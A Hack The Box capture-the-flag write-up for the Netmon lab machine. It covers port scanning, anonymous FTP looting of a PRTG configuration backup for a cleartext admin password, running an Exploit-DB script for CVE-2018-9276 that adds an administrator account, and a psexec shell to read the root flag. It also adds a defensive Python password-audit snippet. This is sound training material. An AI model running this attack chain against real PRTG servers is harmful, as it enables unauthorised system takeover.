Netmon
Ports scan
u505@kali:~/HTB/Machines/Netmon$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.152 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-19 14:21:35 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49665/tcp on 10.10.10.152
Discovered open port 49664/tcp on 10.10.10.152
Discovered open port 80/tcp on 10.10.10.152
Discovered open port 49668/tcp on 10.10.10.152
Discovered open port 21/tcp on 10.10.10.152
Discovered open port 445/tcp on 10.10.10.152
Discovered open port 5985/tcp on 10.10.10.152
Discovered open port 47001/tcp on 10.10.10.152
Discovered open port 49669/tcp on 10.10.10.152
Discovered open port 139/tcp on 10.10.10.152
Discovered open port 135/tcp on 10.10.10.152
Discovered open port 49666/tcp on 10.10.10.152
Discovered open port 49667/tcp on 10.10.10.152

u505@kali:~/HTB/Machines/Netmon$ nmap -sC -sV 10.10.10.152
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-19 09:21 EST
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.037s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m08s, deviation: 0s, median: 1m08s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-19T14:23:03
|_  start_date: 2020-02-19T14:19:50

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.13 seconds
User flag
The user flag is readable over anonymous FTP, which exposes the whole system drive.
u505@kali:~/HTB/Machines/Netmon$ ftp netmon
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd Users/Public
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.04 secs (0.8474 kB/s)
ftp> quit
221 Goodbye.
u505@kali:~/HTB/Machines/Netmon$ cat user.txt
<USER_FLAG>
PRTG Vulnerability
u505@kali:~/HTB/Machines/Netmon$ searchsploit prtg
--------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------- ----------------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Rem | exploits/windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overfl | exploits/windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scri | exploits/java/webapps/34108.txt
--------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Netmon$ searchsploit -m 46527
  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46527
     Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
File Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Netmon/46527.sh
The script has CRLF line endings, so we strip the carriage returns before running it.
u505@kali:~/HTB/Machines/Netmon$ tr -d '\r' <46527.sh > 46527noCR.sh
u505@kali:~/HTB/Machines/Netmon$ chmod +x 46527noCR.sh
This vulnerability creates an OS administrator user on the target, but it is an authenticated one: we first need valid credentials to log into PRTG.
u505@kali:~/HTB/Machines/Netmon$ ./46527noCR.sh

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"
PRTG user and password
Digging further through the anonymous FTP share, the PRTG data directory holds a configuration backup that contains a user and password.
u505@kali:~/HTB/Machines/Netmon$ ftp netmon.htb
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon.htb:u505): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd "/Users/All Users/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> dir -a
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-19-20  10:01AM       <DIR>          Configuration Auto-Backups
02-19-20  07:00PM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
02-20-20  12:00AM       <DIR>          Logs (Web Server)
02-19-20  07:01PM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
02-20-20  09:07AM              1732362 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 0.50 secs (2.2227 MB/s)
ftp> quit
221 Goodbye.
u505@kali:~/HTB/Machines/Netmon$ grep -A4 "dbpassword" "PRTG Configuration.old.bak"
            <dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
            </dbpassword>
...
That password no longer works.
The backup dates from 2018 while the other configuration files are from 2019; the same password with 2019 in place of 2018 works.
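The grep above finds the leaked entry by eye. As an added example (not part of the writeup), here is a small Python audit that scans a PRTG configuration dump for cleartext dbpassword elements, pairs each with the User comment PRTG writes beside it, and flags passwords that carry a year, the rotation pattern that let the stale backup's password be guessed; the second helper is the check a password-change hook would run to reject such a rotation. The sample text is constructed from the element layout shown above and only the prtgadmin value comes from the page.

```python
import re
from typing import Dict, List

# Constructed sample in the layout of the <dbpassword> element seen in the
# "PRTG Configuration.old.bak" grep above; only the prtgadmin entry is from
# the writeup, the other entry is made up.
SAMPLE_BACKUP = """
<data>
  <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
  </dbpassword>
  <dbpassword>
    <!-- User: svc_monitor -->
    x7#Qm9vL2kR
  </dbpassword>
</data>
"""

# Non-greedy so each <dbpassword> element is matched on its own.
DBPASSWORD_RE = re.compile(r"<dbpassword>(.*?)</dbpassword>", re.DOTALL)
USER_COMMENT_RE = re.compile(r"<!--\s*User:\s*(\S+?)\s*-->")
YEAR_RE = re.compile(r"(?:19|20)\d{2}")


def audit_dbpasswords(text: str) -> List[Dict[str, object]]:
    """One finding per cleartext <dbpassword> element in a PRTG config dump."""
    findings = []
    for block in DBPASSWORD_RE.findall(text):
        user_m = USER_COMMENT_RE.search(block)
        # Drop the comment; whatever remains is the stored password.
        value = re.sub(r"<!--.*?-->", "", block, flags=re.DOTALL).strip()
        findings.append({
            "user": user_m.group(1) if user_m else "<unknown>",
            # Never print the secret itself in an audit report.
            "masked": value[:2] + "*" * (len(value) - 2),
            # A year inside the password points at a guessable rotation scheme.
            "year_pattern": bool(YEAR_RE.search(value)),
        })
    return findings


def differs_only_by_year(old: str, new: str) -> bool:
    """True when a rotated password is just the old one with the year changed."""
    return old != new and YEAR_RE.sub("YYYY", old) == YEAR_RE.sub("YYYY", new)


if __name__ == "__main__":
    for finding in audit_dbpasswords(SAMPLE_BACKUP):
        print(finding)
    print(differs_only_by_year("PrTg@dmin2018", "PrTg@dmin2019"))
```

Run it against a real "PRTG Configuration.dat" or backup to list which accounts have cleartext, year-stamped passwords before the file ends up on a share that anonymous users can read.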
Run the exploit
With the values of the authenticated session cookie, we run the exploit, which creates an administrator user on the server.
u505@kali:~/HTB/Machines/Netmon$ ./46527noCR.sh -u http://netmon.htb -c "_ga=GA1.2.1897676822.1582207400; _gid=GA1.2.720517085.1582207400; OCTOPUS1813713946=ezlFNUE1MTZBLTg2QzUtNDkxNS1BNEYwLTNGMUU0RUM4NEE0Mn0%3D; _gat=1"

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

[*] file created
[*] sending notification wait....

[*] adding a new user 'pentest' with password 'P3nT3st'
[*] sending notification wait....

[*] adding a user pentest to the administrators group
[*] sending notification wait....

[*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!
Cookie values
We retrieve the cookie values the exploit needs from the authenticated PRTG session.
Root flag
u505@kali:~/HTB/Machines/Netmon$ /opt/utils/impacket/examples/psexec.py pentest@netmon.htb
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on netmon.htb.....
[*] Found writable share ADMIN$
[*] Uploading file prgVfgJZ.exe
[*] Opening SVCManager on netmon.htb.....
[*] Creating service zFnr on netmon.htb.....
[*] Starting service zFnr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd "C:\Users\Administrator\Desktop"

C:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on netmon.htb.....
[*] Stopping service zFnr.....
[*] Removing service zFnr.....
[*] Removing file prgVfgJZ.exe.....
References
Daniel Simao 08:05, 19 February 2020 (EST)